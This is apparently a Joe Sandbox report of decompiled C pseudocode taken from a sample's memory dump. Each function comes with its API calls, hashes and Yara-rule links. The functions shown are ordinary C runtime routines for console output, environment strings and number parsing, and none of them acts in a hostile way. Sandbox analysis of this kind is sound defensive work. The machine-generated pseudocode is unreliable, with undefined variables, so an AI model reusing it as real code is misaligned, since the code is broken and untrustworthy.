                                                                                              0x01384bfa
                                                                                              0x01384b75
                                                                                              0x01384b4b
                                                                                              0x00000000
                                                                                              0x01384d8e
                                                                                              0x01384d8e
                                                                                              0x01384d97
                                                                                              0x01384e12
                                                                                              0x01384e17
                                                                                              0x01384e1f
                                                                                              0x01384e20
                                                                                              0x01384e21
                                                                                              0x01384e2d
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,?,00000000,?), ref: 01384AC4
                                                                                                • Part of subcall function 0136F1C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,013843B7,?,00000000,-00000008), ref: 0136F26C
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 01384D1F
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01384D67
                                                                                              • GetLastError.KERNEL32 ref: 01384E0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: 03cbda0a1e2d60a73816bb0ceb57b5a784a7cc0ed88a63abec572b9a681b2983
                                                                                              • Instruction ID: 37071df4fa07fb89308abf9569467a8f126fad10020387a2ec8b4246039d71f2
                                                                                              • Opcode Fuzzy Hash: 03cbda0a1e2d60a73816bb0ceb57b5a784a7cc0ed88a63abec572b9a681b2983
                                                                                              • Instruction Fuzzy Hash: 19D17A75D04249AFCF15DFA8D880AADFBB8FF48318F18452AE956EB741E730A941CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01385B18 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E01385B18(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x139dc58);
				E01353A50(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E013547B0(_t107, E013542C9(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E013547B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x13a014c;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x13a2000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0135B0BB(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x139dc78);
									E01353A50(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E01385B18(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E01385554(_t103, _t108[0x18], E013542C9( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E01385564(_t103, _t108[0x18], E013542C9( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E013542C9();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                              0x01385b18
                                                                                              0x01385b1a
                                                                                              0x01385b1f
                                                                                              0x01385b24
                                                                                              0x01385b26
                                                                                              0x01385b29
                                                                                              0x01385b2e
                                                                                              0x01385c3e
                                                                                              0x01385c3e
                                                                                              0x01385c3e
                                                                                              0x00000000
                                                                                              0x01385b3d
                                                                                              0x01385b3d
                                                                                              0x01385b42
                                                                                              0x01385b4c
                                                                                              0x01385b4e
                                                                                              0x01385b53
                                                                                              0x01385b58
                                                                                              0x01385b58
                                                                                              0x01385b5a
                                                                                              0x01385b5d
                                                                                              0x01385b62
                                                                                              0x01385b84
                                                                                              0x01385b84
                                                                                              0x01385b87
                                                                                              0x01385b8a
                                                                                              0x01385ba8
                                                                                              0x01385bab
                                                                                              0x01385bea
                                                                                              0x01385bed
                                                                                              0x01385bf0
                                                                                              0x01385c15
                                                                                              0x01385c17
                                                                                              0x00000000
                                                                                              0x01385c19
                                                                                              0x01385c19
                                                                                              0x01385c1b
                                                                                              0x00000000
                                                                                              0x01385c1d
                                                                                              0x01385c1d
                                                                                              0x01385c22
                                                                                              0x01385c26
                                                                                              0x01385c26
                                                                                              0x01385c27
                                                                                              0x00000000
                                                                                              0x01385c27
                                                                                              0x01385c1b
                                                                                              0x01385bf2
                                                                                              0x01385bf2
                                                                                              0x01385bf4
                                                                                              0x00000000
                                                                                              0x01385bf6
                                                                                              0x01385bf6
                                                                                              0x01385bf8
                                                                                              0x00000000
                                                                                              0x01385bfa
                                                                                              0x01385c0b
                                                                                              0x00000000
                                                                                              0x01385c10
                                                                                              0x01385bf8
                                                                                              0x01385bf4
                                                                                              0x01385bad
                                                                                              0x01385bad
                                                                                              0x01385bb1
                                                                                              0x00000000
                                                                                              0x01385bb7
                                                                                              0x01385bb7
                                                                                              0x01385bb9
                                                                                              0x00000000
                                                                                              0x01385bbf
                                                                                              0x01385bc6
                                                                                              0x01385bce
                                                                                              0x01385bd2
                                                                                              0x01385bd4
                                                                                              0x01385bd7
                                                                                              0x01385bdc
                                                                                              0x01385bdd
                                                                                              0x00000000
                                                                                              0x01385bdd
                                                                                              0x01385bd7
                                                                                              0x00000000
                                                                                              0x01385bd2
                                                                                              0x01385bb9
                                                                                              0x01385bb1
                                                                                              0x01385b8c
                                                                                              0x01385b8c
                                                                                              0x00000000
                                                                                              0x01385b8c
                                                                                              0x01385b69
                                                                                              0x01385b69
                                                                                              0x01385b6e
                                                                                              0x01385b73
                                                                                              0x00000000
                                                                                              0x01385b75
                                                                                              0x01385b77
                                                                                              0x01385b80
                                                                                              0x01385b8f
                                                                                              0x01385b91
                                                                                              0x01385c50
                                                                                              0x01385c50
                                                                                              0x01385c55
                                                                                              0x01385c56
                                                                                              0x01385c58
                                                                                              0x01385c5d
                                                                                              0x01385c62
                                                                                              0x01385c65
                                                                                              0x01385c68
                                                                                              0x01385c6b
                                                                                              0x01385c74
                                                                                              0x01385c74
                                                                                              0x01385c6d
                                                                                              0x01385c6d
                                                                                              0x01385c6d
                                                                                              0x01385c77
                                                                                              0x01385c7b
                                                                                              0x01385c7e
                                                                                              0x01385c7f
                                                                                              0x01385c80
                                                                                              0x01385c81
                                                                                              0x01385c84
                                                                                              0x01385c8d
                                                                                              0x01385c8d
                                                                                              0x01385c90
                                                                                              0x01385cc6
                                                                                              0x01385c92
                                                                                              0x01385c92
                                                                                              0x01385c92
                                                                                              0x01385c95
                                                                                              0x01385cac
                                                                                              0x01385cac
                                                                                              0x01385c95
                                                                                              0x01385ccb
                                                                                              0x01385cd5
                                                                                              0x01385ce1
                                                                                              0x01385b9f
                                                                                              0x01385b9f
                                                                                              0x01385ba4
                                                                                              0x01385ba5
                                                                                              0x01385bdf
                                                                                              0x01385be6
                                                                                              0x01385c2a
                                                                                              0x01385c2a
                                                                                              0x01385c31
                                                                                              0x01385c40
                                                                                              0x01385c43
                                                                                              0x01385c4f
                                                                                              0x01385c4f
                                                                                              0x01385b91
                                                                                              0x01385b73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385b42

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: abc7f3cb4d523e926a4389e2b20cef5c1a79d300ab40623b92caef3660a0e82b
                                                                                              • Instruction ID: 74d6629956d56dace86b6f90d5d1d73cb4ca5f7811d921f847e39c84d5c3a49b
                                                                                              • Opcode Fuzzy Hash: abc7f3cb4d523e926a4389e2b20cef5c1a79d300ab40623b92caef3660a0e82b
                                                                                              • Instruction Fuzzy Hash: 5E51A271601306EFEF29AF58D840B6A7BB5FF54718F144629EE0597691E731E880CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136D572 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0136D572(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E0136F1C0(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E0136D54E(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E0136777A(GetLastError());
									_t20 =  *((intOrPtr*)(E013676C8()));
								}
								L14:
								return _t20;
							}
							_t20 = E0136D0ED(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0136777A(GetLastError());
						return  *((intOrPtr*)(E013676C8()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E0136D0ED(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E0136D083(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                                                                                              0x0136d579
                                                                                              0x0136d57e
                                                                                              0x0136d59c
                                                                                              0x0136d59e
                                                                                              0x0136d5a1
                                                                                              0x0136d5ca
                                                                                              0x0136d5d2
                                                                                              0x0136d5d4
                                                                                              0x0136d5ed
                                                                                              0x0136d5f0
                                                                                              0x0136d5f3
                                                                                              0x0136d601
                                                                                              0x0136d60e
                                                                                              0x0136d613
                                                                                              0x0136d615
                                                                                              0x0136d62e
                                                                                              0x0136d631
                                                                                              0x0136d631
                                                                                              0x0136d617
                                                                                              0x0136d61e
                                                                                              0x0136d629
                                                                                              0x0136d629
                                                                                              0x0136d633
                                                                                              0x00000000
                                                                                              0x0136d633
                                                                                              0x0136d5f8
                                                                                              0x0136d5fd
                                                                                              0x0136d5ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d5ff
                                                                                              0x0136d5dd
                                                                                              0x00000000
                                                                                              0x0136d5e8
                                                                                              0x0136d5a3
                                                                                              0x0136d5a6
                                                                                              0x0136d5a9
                                                                                              0x0136d5b8
                                                                                              0x0136d5bb
                                                                                              0x0136d592
                                                                                              0x0136d592
                                                                                              0x00000000
                                                                                              0x0136d595
                                                                                              0x0136d5af
                                                                                              0x0136d5b4
                                                                                              0x0136d5b6
                                                                                              0x0136d637
                                                                                              0x0136d637
                                                                                              0x00000000
                                                                                              0x0136d5b6
                                                                                              0x0136d580
                                                                                              0x0136d585
                                                                                              0x0136d58a
                                                                                              0x0136d58c
                                                                                              0x0136d58f
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0136F1C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,013843B7,?,00000000,-00000008), ref: 0136F26C
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0136D981,?,?,?,00000000), ref: 0136D5D6
                                                                                              • __dosmaperr.LIBCMT ref: 0136D5DD
                                                                                              • GetLastError.KERNEL32(00000000,0136D981,?,?,00000000,?,?,?,00000000,00000000,?,0136D981,?,?,?,00000000), ref: 0136D617
                                                                                              • __dosmaperr.LIBCMT ref: 0136D61E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 5453ea1e47215f4d0c10a8fb1a9031bf81ae672340269158ad69c3f27f97cb9d
                                                                                              • Instruction ID: b4827511d3a59b3c39a3a84e3a5f0bc6c34a5a36652283e62726e61e8254b0c7
                                                                                              • Opcode Fuzzy Hash: 5453ea1e47215f4d0c10a8fb1a9031bf81ae672340269158ad69c3f27f97cb9d
                                                                                              • Instruction Fuzzy Hash: 1F21CF71700206AFDB21AFE9D88086AB7ADFF5537C780C418E999D7A58D735EC008BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136F2DC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 17%
                                                                                              			E0136F2DC() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E0136F3DC(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E0136F1C0(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E01367865(_t9);
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E0136F1C0() != 0) {
								E01364B6E(0);
								_t19 = _t26;
							} else {
								E01364B6E(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E01364B6E();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}











                                                                                              0x0136f2e2
                                                                                              0x0136f2e4
                                                                                              0x0136f2ea
                                                                                              0x0136f2ee
                                                                                              0x0136f2f6
                                                                                              0x0136f2fb
                                                                                              0x0136f309
                                                                                              0x0136f30c
                                                                                              0x0136f314
                                                                                              0x0136f319
                                                                                              0x0136f32d
                                                                                              0x0136f330
                                                                                              0x0136f333
                                                                                              0x0136f346
                                                                                              0x0136f347
                                                                                              0x0136f34a
                                                                                              0x0136f34b
                                                                                              0x0136f34e
                                                                                              0x0136f34f
                                                                                              0x0136f350
                                                                                              0x0136f35b
                                                                                              0x0136f366
                                                                                              0x0136f36b
                                                                                              0x0136f35d
                                                                                              0x0136f35e
                                                                                              0x0136f35e
                                                                                              0x0136f36f
                                                                                              0x0136f375
                                                                                              0x0136f335
                                                                                              0x0136f335
                                                                                              0x0136f33c
                                                                                              0x0136f342
                                                                                              0x0136f342
                                                                                              0x0136f31b
                                                                                              0x0136f31c
                                                                                              0x0136f322
                                                                                              0x0136f322
                                                                                              0x0136f378
                                                                                              0x0136f37b

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0136F2E4
                                                                                                • Part of subcall function 0136F1C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,013843B7,?,00000000,-00000008), ref: 0136F26C
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0136F31C
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0136F33C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: 065ef4dc1fd308362477100a6dbce9697a50f227d5d42fd9894fbd97c75deee7
                                                                                              • Instruction ID: 9ad83da8830abc5fa0a305368790029f5cf597127f027e1d5864a5d3f445c229
                                                                                              • Opcode Fuzzy Hash: 065ef4dc1fd308362477100a6dbce9697a50f227d5d42fd9894fbd97c75deee7
                                                                                              • Instruction Fuzzy Hash: 2A1196F190161ABFEB222B79BCDDC7F695CDF956AC7204125F401D210DFA64CE1086B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0138FD7B Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0138FD7B(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x139eab0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0138FDEF();
					E0138FDD0();
					_t13 = WriteConsoleW( *0x139eab0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                              0x0138fd98
                                                                                              0x0138fd9c
                                                                                              0x0138fda9
                                                                                              0x0138fdae
                                                                                              0x0138fdc9
                                                                                              0x0138fdc9
                                                                                              0x0138fdcf

                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000), ref: 0138FD92
                                                                                              • GetLastError.KERNEL32(?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?,?,?,013847A9,?), ref: 0138FD9E
                                                                                                • Part of subcall function 0138FDEF: CloseHandle.KERNEL32(FFFFFFFE,0138FDAE,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?,?), ref: 0138FDFF
                                                                                              • ___initconout.LIBCMT ref: 0138FDAE
                                                                                                • Part of subcall function 0138FDD0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0138FD6C,0138A55F,?,?,01384E5E,?,?,00000000,?), ref: 0138FDE3
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0138A572,?,00000001,?,?,?,01384E5E,?,?,00000000,?), ref: 0138FDC3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 207520196e53cc3d9818917a11430545a136c1a4656ebf105e96e466e3be82d5
                                                                                              • Instruction ID: 1932d042706fd896d491e6cde9473c7a7650264f133be33e431e30fdee6f0287
                                                                                              • Opcode Fuzzy Hash: 207520196e53cc3d9818917a11430545a136c1a4656ebf105e96e466e3be82d5
                                                                                              • Instruction Fuzzy Hash: 79F01C36100256FBCF223FA5DC489993F2AFF083A8F454010FE2995168C632C924DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01382DDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E01382DDF(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t88;
				intOrPtr _t90;
				signed int _t93;
				signed int _t94;
				signed int _t108;
				signed int _t109;
				signed char _t111;
				signed int _t112;
				intOrPtr _t114;
				signed int _t115;
				signed int _t119;
				signed int _t122;
				intOrPtr* _t126;
				signed int _t133;
				signed int _t134;
				intOrPtr* _t140;
				signed int _t143;
				intOrPtr _t145;
				signed char _t148;
				signed int _t149;
				signed int _t150;
				intOrPtr* _t152;
				signed int _t153;
				signed int* _t157;
				signed int _t160;
				intOrPtr* _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t176;
				void* _t177;

				if(E0137E1BF( &_a8) == 0) {
					L5:
					_t152 = _a12;
					if(_t152 != 0) {
						 *_t152 = _a8;
					}
					L60:
					return 0;
				}
				_t173 = _a16;
				if(_t173 == 0 || _t173 >= 2 && _t173 <= 0x24) {
					_t88 = _a8;
					_t172 = 0;
					_v20 = _v20 & 0x00000000;
					_v44 = _t88;
					_t148 =  *_t88;
					_a8 = _t88 + 1;
					_t90 = _a4;
					_v12 = _t148;
					__eflags =  *((char*)(_t90 + 0x14));
					if( *((char*)(_t90 + 0x14)) == 0) {
						E01371420(_t90, _t165);
						_t90 = _a4;
					}
					_t91 = _t90 + 0xc;
					_v16 = _t90 + 0xc;
					_t93 = E013827BE(_t148, _t165, _t172, _t173, _t148 & 0x000000ff, 8, _t91);
					_t177 = _t176 + 0xc;
					__eflags = _t93;
					if(_t93 == 0) {
						L13:
						_t94 = _a20 & 0x000000ff;
						_v8 = _t94;
						__eflags = _t148 - 0x2d;
						if(_t148 != 0x2d) {
							__eflags = _t148 - 0x2b;
							if(_t148 != 0x2b) {
								_t153 = _a8;
								L18:
								__eflags = _t173;
								if(_t173 == 0) {
									L20:
									__eflags = _t148 - 0x30 - 9;
									if(_t148 - 0x30 > 9) {
										__eflags = _t148 - 0x61 - 0x19;
										if(_t148 - 0x61 > 0x19) {
											__eflags = _t148 - 0x41 - 0x19;
											if(_t148 - 0x41 > 0x19) {
												L35:
												__eflags = _t173;
												if(_t173 == 0) {
													_t173 = 0xa;
												}
												L37:
												_t101 = _t173;
												asm("cdq");
												_t154 = _t165;
												_v28 = _t173;
												_v24 = _t165;
												_v36 = L01383E00(0xffffffff, 0xffffffff, _t101, _t154);
												_v32 = _t165;
												while(1) {
													__eflags = _t148 - 0x30 - 9;
													if(_t148 - 0x30 > 9) {
														__eflags = _t148 - 0x61 - 0x19;
														if(_t148 - 0x61 > 0x19) {
															_t108 = _t148 - 0x41;
															__eflags = _t108 - 0x19;
															if(_t108 > 0x19) {
																_t109 = _t108 | 0xffffffff;
																__eflags = _t109;
															} else {
																_t109 = _t148 + 0xffffffc9;
															}
														} else {
															_t109 = _t148 + 0xffffffa9;
														}
													} else {
														_t109 = _t148 + 0xffffffd0;
													}
													_v16 = _t109;
													__eflags = _t109 - _t173;
													if(_t109 >= _t173) {
														break;
													}
													_t150 = _v20;
													_v20 = E01389D90(_v28, _v24, _t150, _t172);
													_t160 = _v16 + _v20;
													_v40 = _t165;
													asm("adc eax, edx");
													_v16 = 0;
													__eflags = _t172 - _v32;
													if(__eflags < 0) {
														L50:
														_t165 = 0;
														__eflags = 0;
														L51:
														__eflags = 0 - _v40;
														if(__eflags > 0) {
															L55:
															_t122 = 0;
															__eflags = 0;
															L56:
															_t172 = _v16;
															_v20 = _t160;
